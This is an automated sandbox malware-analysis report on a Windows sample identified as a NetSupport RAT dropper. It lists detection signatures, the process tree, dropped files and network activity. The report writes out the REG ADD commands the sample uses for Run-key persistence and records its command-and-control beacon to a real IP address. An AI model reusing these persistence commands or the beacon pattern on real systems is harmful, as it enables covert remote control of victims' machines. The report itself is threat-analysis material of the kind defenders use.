Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1562378
MD5:a3cea314d888a08b79002656a9f4b927
SHA1:396b9f96219785f0c80c69703dc623c23554affc
SHA256:64356e6b4781925ef940695d869a826dc229e911919faf8729d8dfb34f31e61a
Tags:exeuser-Bitsight
Infos:

Detection

NetSupport RAT
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionalty to change the wallpaper
Delayed program exit found
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Uses cmd line tools excessively to alter registry or file data
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6336 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A3CEA314D888A08B79002656A9F4B927)
    • cmd.exe (PID: 824 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 2992 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 3732 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • shv.exe (PID: 3492 cmdline: C:\Users\Public\Netstat\shv.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)
      • reg.exe (PID: 3704 cmdline: REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 6988 cmdline: REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • shv.exe (PID: 7008 cmdline: C:\Users\Public\Netstat\shv.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • shv.exe (PID: 6340 cmdline: "C:\Users\Public\Netstat\shv.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • shv.exe (PID: 7008 cmdline: "C:\Users\Public\Netstat\shv.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • shv.exe (PID: 3244 cmdline: "C:\Users\Public\Netstat\shv.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Netstat\shv.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\Public\Netstat\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\Public\Netstat\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\Public\Netstat\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\Public\Netstat\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000005.00000002.4131581542.0000000000F02000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000008.00000000.1691809237.0000000000F02000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    0000000E.00000002.1968165061.0000000000F02000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 38 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      5.2.shv.exe.f00000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        9.2.shv.exe.f00000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          9.0.shv.exe.f00000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            11.2.shv.exe.f00000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              8.2.shv.exe.73af0000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 38 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Execution from Suspicious Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Netstat\shv.exe, CommandLine: C:\Users\Public\Netstat\shv.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Netstat\shv.exe, NewProcessName: C:\Users\Public\Netstat\shv.exe, OriginalFileName: C:\Users\Public\Netstat\shv.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 824, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Netstat\shv.exe, ProcessId: 3492, ProcessName: shv.exe
                                Sigma detected: New RUN Key Pointing to Suspicious Folder
                                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Netstat\shv.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 2992, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
                                Sigma detected: Suspicious Program Location with Network Connections
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 45.61.128.74, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Netstat\shv.exe, Initiated: true, ProcessId: 3492, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Netstat\shv.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 2992, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
                                Sigma detected: Direct Autorun Keys Modification
                                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 824, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", ProcessId: 2992, ProcessName: reg.exe
                                Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 824, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", ProcessId: 2992, ProcessName: reg.exe

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-11-25T14:58:03.946249+010028277451Malware Command and Control Activity Detected192.168.2.44973045.61.128.74443TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\Public\Netstat\remcmdstub.exeReversingLabs: Detection: 13%
                                Source: C:\Users\Public\Netstat\shv.exeReversingLabs: Detection: 28%
                                Multi AV Scanner detection for submitted file
                                Source: file.exeReversingLabs: Detection: 39%
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.4% probability
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,5_2_110AD570
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,8_2_110AD570
                                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Public\Netstat\msvcr100.dllJump to behavior
                                Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: Binary string: msvcr100.i386.pdb source: shv.exe, shv.exe, 00000005.00000002.4133157062.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, shv.exe, 00000008.00000002.1694833283.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, shv.exe, 00000009.00000002.1806765097.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, shv.exe, 0000000B.00000002.1887019832.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, shv.exe, 0000000E.00000002.1968818486.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: shv.exe, 00000005.00000002.4133414083.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000008.00000002.1695153610.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000009.00000002.1807037873.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000B.00000002.1887260588.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000E.00000002.1969045817.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: shv.exe, 00000005.00000002.4131581542.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000005.00000000.1680595805.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000008.00000000.1691809237.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000008.00000002.1694138825.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000002.1805359841.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000000.1802595368.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000000.1884540195.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000002.1886119575.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000002.1968165061.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000000.1965850134.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: shv.exe, 00000005.00000002.4133318649.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, shv.exe, 00000008.00000002.1695028330.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, shv.exe, 00000009.00000002.1806911181.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, shv.exe, 0000000B.00000002.1887171743.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, shv.exe, 0000000E.00000002.1968966209.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, pcicapi.dll.0.dr
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1940BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6FE1940BC
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6FE1AB190
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1BFCA0 FindFirstFileExA,0_2_00007FF6FE1BFCA0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_11065890
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106A0A0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111266E0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,8_2_1102D330
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,8_2_11065890
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,8_2_1106A0A0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,8_2_111266E0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,8_2_1110AFD0

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49730 -> 45.61.128.74:443
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.1.231 104.26.1.231
                                Source: Joe Sandbox ViewASN Name: M247GB M247GB
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.128.74
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.128.74
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.128.74
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://45.61.128.74/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.61.128.74Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675691550.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675726387.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1674859649.000001AFA17C2000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675691550.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675726387.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1674859649.000001AFA17C2000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htm
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675691550.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675726387.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1674859649.000001AFA17C2000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: shv.exe, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                Source: shv.exe, 00000005.00000002.4131206311.0000000000B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/Echo
                                Source: shv.exe, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: shv.exe, 00000005.00000002.4131206311.0000000000B9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp$
                                Source: shv.exe, 00000005.00000002.4131206311.0000000000B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp0
